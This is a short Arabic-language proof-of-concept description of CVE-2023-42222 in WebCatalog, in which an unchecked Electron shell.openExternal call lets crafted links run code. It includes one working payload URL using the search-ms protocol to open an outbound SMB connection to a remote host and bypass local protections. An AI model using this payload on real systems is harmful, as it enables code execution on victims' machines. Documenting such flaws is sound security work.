
إثبات مفهوم لاستغلال الثغرة CVE-2023-42222 في WebCatalog، يوضح تنفيذ عنوان URL عشوائي عبر Electron's shell.openExternal لتجاوز حماية الأمان وتنفيذ كود.
يستدعي WebCatalog قبل الإصدار 48.4.0 دالة Electron shell.openExternal دون التحقق من أن عنوان URL هو لمورد http أو https، في بعض الظروف. تسمح هذه الثغرة الأمنية لمهاجم بتنفيذ كود على جهاز الضحية عن طريق إرسال رسائل تحتوي على روابط ذات بروتوكولات عشوائية. يجب على الضحية التفاعل مع الرابط ويشاهد عنوان URL الذي يتم فتحه.


يمكن تأكيد الثغرة الأمنية عن طريق مزامنة صفحة تسمح بعناوين URL عشوائية. إذا تمت مزامنة موقع ويب يحتوي على search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools، فسيتم إنشاء اتصال SMB خارجي. يمكن بعد ذلك استخدام ذلك لتجاوز الحماية الأمنية على الجهاز المحلي وعرض ملفات ضارة للمستخدم، والتي عادةً ما يتم حظرها.